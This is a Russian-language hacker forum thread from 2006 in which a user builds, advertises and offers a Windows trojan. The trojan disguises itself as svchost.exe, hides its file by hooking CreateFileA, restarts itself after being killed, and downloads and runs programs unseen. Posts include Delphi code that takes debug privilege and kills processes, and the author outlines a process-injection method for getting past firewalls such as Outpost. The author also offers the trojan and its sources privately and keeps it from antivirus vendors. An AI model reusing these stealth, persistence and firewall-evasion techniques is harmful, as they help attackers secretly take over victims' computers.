Идеи для трояна, подскажите
Пользователи, просматривающие топик: none
|
Зашли как: Guest
|
Имя  |
| Сообщение |
<< Старые топики Новые топики >> |
|
|
Идеи для трояна, подскажите - 2006-04-10 09:04:44
|
|
|
SLESH
Сообщений: 109
Оценки: 0
Присоединился: 2005-08-19 11:37:22
|
Вот написал я пока простенький троян. Пока он ничего плохого не делает.
Шас он умеет сам устанавливаться. Работает в ХР как сервис. Не каждый опытный человек его сможет найти. Также отслеживает запуск и завершение программ. Все сохраняет в лог. Пока он запущен, к логу никто не имеет доступ, даже для чтения.
Я вот по какому вопросу. Может быть ктонить пытался завершить процессы WinLogon и SMSS?? Эти процессы через диспечер задач нельзя завершить. Вот и я также хочу сделать. Может кто знает как это сделать.
И еще посоветуйте что можно добавить в троян.
Шас доделываю функцию reverse-shell. т.е Троян будет снифить все входящие данные и модема, и если найдет определенную последовательность байт(посланную на какойнить порт) то из этой строки считывает IP и подрубается к этому компу и дает еще Shell
|
|
|
|
|
Идеи для трояна, подскажите - 2006-04-10 12:11:17
|
|
|
Pupkin-Zade
Сообщений: 9398
Оценки: 1489
Присоединился: 2004-03-10 13:54:16
|
Их надо назвать просто winlogon и svchost.exe - и они удаляться не будут :)
|
|
|
|
|
Идеи для трояна, подскажите - 2006-04-10 16:57:35
|
|
|
SLESH
Сообщений: 109
Оценки: 0
Присоединился: 2005-08-19 11:37:22
|
Мой троян и устанавливается в винду с именем SVCHOST.EXE
|
|
|
|
|
Идеи для трояна, подскажите - 2006-04-15 15:11:30
|
|
|
serber
Сообщений: 7
Оценки: 0
Присоединился: 2006-04-15 15:05:17
|
Для завершения системных процессов попробуй сначала повысить привилегии твоей программы, а потом просто заверши нужный процесс. На Делфи можно сдклать так:
function SetPrivileges:Boolean;
var
hToken:THandle;
SeDebugNameValue:Int64;
tkp:TOKEN_PRIVILEGES;
ReturnLength:Cardinal;
begin
Result:=false;
if not OpenProcessToken( GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES
or TOKEN_QUERY, hToken ) then
exit;
if not LookupPrivilegeValue( nil, 'SeDebugPrivilege', SeDebugNameValue )
then begin
CloseHandle(hToken);
exit;
end;
tkp.PrivilegeCount:= 1;
tkp.Privileges[0].Luid := SeDebugNameValue;
tkp.Privileges[0].Attributes := SE_PRIVILEGE_ENABLED;
AdjustTokenPrivileges(hToken,false,tkp,SizeOf(tkp),tkp,ReturnLength);
if GetLastError()<> ERROR_SUCCESS then exit;
end;
function KillTask(ExeFileName: string): integer; // Убиваем процесс
const
PROCESS_TERMINATE=$0001;
var
ContinueLoop: BOOL;
FSnapshotHandle: THandle;
FProcessEntry32: TProcessEntry32;
begin
result := 0;
FSnapshotHandle := CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0);
FProcessEntry32.dwSize := Sizeof(FProcessEntry32);
ContinueLoop := Process32First(FSnapshotHandle, FProcessEntry32);
while integer(ContinueLoop) <> 0 do
begin
if ((UpperCase(ExtractFileName(FProcessEntry32.szExeFile)) = UpperCase(ExeFileName))
or (UpperCase(FProcessEntry32.szExeFile) = UpperCase(ExeFileName))) then
Result := Integer(TerminateProcess(OpenProcess(PROCESS_TERMINATE, BOOL(0), FProcessEntry32.th32ProcessID), 0));
ContinueLoop := Process32Next(FSnapshotHandle, FProcessEntry32);
end;
CloseHandle(FSnapshotHandle);
end;
|
|
|
|
|
Идеи для трояна, подскажите - 2006-04-15 16:53:55
|
|
|
AdReNaL1Ne
Сообщений: 8027
Оценки: 350
Присоединился: 2005-09-11 06:38:05
|
А какой смысл завершать winlogon и smss? Это приводит к завершению работы системы.
|
|
|
|
|
Идеи для трояна, подскажите - 2006-04-15 19:00:59
|
|
|
Lesha Lomalkin
Сообщений: 40
Оценки: 0
Присоединился: 2006-03-14 18:34:47
|
Реально убить можно все, но вот только нужен другой таскменеджер, например: http://www.sysinternals.com/Files/ProcessExplorerNt.zip всем рекомендую [sm=1.gif]
Реально не смог ей убить только проинсталленый Оутпост, уже после перезагрузки, прав нет на него и все!
PS Очень хороший аналог обычному менеджеру, только незабудьте поставить птичку "Replase Task Manager" в меню "Options"
|
|
|
|
|
Идеи для трояна, подскажите - 2006-04-16 11:20:08
|
|
|
SLESH
Сообщений: 109
Оценки: 0
Присоединился: 2005-08-19 11:37:22
|
Дело в том, что не надо убивать процессы. А просто надо встраивать хитрые функциии. Шас троян дошел до таких вершин, что может скачивать и запускать из нета проги без ведома пользователя, даже если стоит Outpost. Также троян шас перехватывает функцию CreateFileA и блокирует доступ для чтения своего тела. Тоесть большинство программ при чтении этого файла пишут что ошибка чтения диска. Тыпался сделать чтобы он перехватывал функцию чтения каталога, чтобы убирать себя из списка, но както не получается.
|
|
|
|
|
Идеи для трояна, подскажите - 2006-04-17 18:50:59
|
|
|
Lesha Lomalkin
Сообщений: 40
Оценки: 0
Присоединился: 2006-03-14 18:34:47
|
Интересно[sm=1.gif], но особенно интересно, как справляешься с Оутпостом, если не секрет [sm=1.gif]
|
|
|
|
|
Идеи для трояна, подскажите - 2006-04-17 23:35:32
|
|
|
SLESH
Сообщений: 109
Оценки: 0
Присоединился: 2005-08-19 11:37:22
|
Кому интерестно как обходит оутпост могу написать подробно. также обходит и другие сетевые экраны.
Суть обхода - незаметное подключение к svchost и с помошью него скачивание файлов. Примерно это выглядет так:
1) запускаем процесс, которому разрешено лезть на 80 порт
CreateProcess(nil, 'svchost.exe', nil, nil, false, CREATE_SUSPENDED, nil, nil,St, Pr);
выделяем память в процессе
внедряем код
изменяем контекст нити
запускаем процесс
ResumeThread(Pr.hThread);
Вот и все.
|
|
|
|
|
Идеи для трояна, подскажите - 2006-04-21 12:37:19
|
|
|
SLESH
Сообщений: 109
Оценки: 0
Присоединился: 2005-08-19 11:37:22
|
Вот написал САЙТ. ПОСВЕТИЛ Полностью моему трояну.
Кому интерестно www.mytroj.narod.ru
ЕСЛи будут предложения шлите на мыло (оно там указано) или в гостевухе пишите
|
|
|
|
|
Идеи для трояна, подскажите - 2006-04-21 12:39:34
|
|
|
SLESH
Сообщений: 109
Оценки: 0
Присоединился: 2005-08-19 11:37:22
|
Я там даже описал принцип обхода Outpost'a
|
|
|
|
|
Идеи для трояна, подскажите - 2006-04-24 11:43:35
|
|
|
Virus_NX
Сообщений: 81
Оценки: 0
Присоединился: 2006-04-12 11:03:55
|
Молодец!!![sm=10.gif]
Одним словом хаке[sm=1.gif][sm=1.gif]р
|
|
|
|
|
Идеи для трояна, подскажите - 2006-05-02 15:45:43
|
|
|
SLESH
Сообщений: 109
Оценки: 0
Присоединился: 2005-08-19 11:37:22
|
Кому интерестно то на сайт выложил последнее обновление инфы о моем трояне. Столько нововедений в нем теперь, что даже откладывается релиз альфа версии на 3-4 дня
|
|
|
|
|
Идеи для трояна, подскажите - 2006-05-11 12:49:30
|
|
|
SLESH
Сообщений: 109
Оценки: 0
Присоединился: 2005-08-19 11:37:22
|
Короче, вот что было добавленно мною:
* троян мой теперь после установки сам запускается(не надо перезагружать комп)
* после запуск запускной файл невозможно прочитать. даже антивирь не может его проверить
* САМОЕ главное после запуска он по методу обхода фаервола запускает настоящий SVCHOST и присоединяет к ниму код, которые проверяет запущенность сервиса. То есть если вы вырубите троян, то он максимум через 2 секунды запуститься опять. После того как процедура безопасности находит что сервис завершен, она запускает его заново и сама завершается. Завершается для потому, что после запуска сервиса он опять установит процедуру безопасности.
НУ КАК ВАМ ТЕПЕРЬ ЕГО ВОЗМОЖНОСТИ?!
|
|
|
|
|
Идеи для трояна, подскажите - 2006-05-15 19:52:04
|
|
|
SLESH
Сообщений: 109
Оценки: 0
Присоединился: 2005-08-19 11:37:22
|
УРА, УРА, УРА!!!
Вышла Alfa версия трояна. Короче кому интерстно то можете
скачать его описание: www.mytroj.narod.ru/help.chm
Троян абсолютно бесплатный. Кому нужен, то обращайтесь ко мне на:
мыло: SLESH-2000@yandex.ru
АСЯ: 266-334-734
Если кого-то заинтересовали исходники, то как нибудь договоримся.
Троян полезен по большей часте тем, кто умеет хоть чуть програмить.
Все предложения отправляйте на мыло.
На сайт выкладывать троян не хочу, так как 100% попадет он к разработчикам антивирей!
Пока буду пытаться делать прогу, для выкидывания его из системы.
|
|
|
|
|
Идеи для трояна, подскажите - 2006-05-21 18:21:16
|
|
|
Virus_NX
Сообщений: 81
Оценки: 0
Присоединился: 2006-04-12 11:03:55
|
Молодец что не будешь+))Послушал меня+))А своё замечание выложу у тебя в гостевухе[sm=em88.gif]
|
|
|
|
|
Идеи для трояна, подскажите - 2006-05-23 18:27:33
|
|
|
sdf4
Сообщений: 16
Оценки: 0
Присоединился: 2005-08-24 12:15:04
|
>Прикольная защита от ламеров…[sm=4.gif]
|
|
|
|
|
Идеи для трояна, подскажите - 2006-05-23 19:16:51
|
|
|
MrBlack
Сообщений: 268
Оценки: 0
Присоединился: 2004-05-24 00:02:27
|
quote:
—————-<BR>Цитата: Дата:17.04.2006 23:35:32, Автор:SLESH ::
Кому интерестно как обходит оутпост могу написать подробно. также обходит и другие сетевые экраны.<BR><BR>Суть обхода - незаметное подключение к svchost и с помошью него скачивание файлов. Примерно это выглядет так:<BR><BR><BR>1) запускаем процесс, которому разрешено лезть на 80 порт<BR><BR>CreateProcess(nil, 'svchost.exe', nil, nil, false, CREATE_SUSPENDED, nil, nil,St, Pr);<BR><BR>выделяем память в процессе<BR><BR>внедряем код<BR><BR>изменяем контекст нити<BR><BR>запускаем процесс<BR><BR>ResumeThread(Pr.hThread);<BR><BR><BR>Вот и все.<BR><BR>
—————-
А ты с какой версией оутпоста это проверял? У меня Outpost Firewall Pro ver. 3.51.748.6419 (462), и он ругается и блокирует доступ любой проге, в память которой была запись
|
|
|
|
|
Идеи для трояна, подскажите - 2006-05-26 19:43:46
|
|
|
Virus_NX
Сообщений: 81
Оценки: 0
Присоединился: 2006-04-12 11:03:55
|
А ты попробуй…
Все вопросы отпадут сами собой…[sm=em88.gif]
|
|
|
|
|
Идеи для трояна, подскажите - 2006-06-01 12:38:37
|
|
|
Lord Divius
Сообщений: 188
Оценки: 0
Присоединился: 2005-12-31 15:44:03
|
Вот на сайте увидел:
"Как-то раз мне попал в руки исходник одного сервиса под XP."
А не дашь этот самый исходник, а? Хочу покопаться…
|
|
|
|
|
Идеи для трояна, подскажите - 2006-06-01 12:40:03
|
|
|
Lord Divius
Сообщений: 188
Оценки: 0
Присоединился: 2005-12-31 15:44:03
|
А уж если сам троян… мммм….[sm=12.gif]
|
|
|
|
|
|
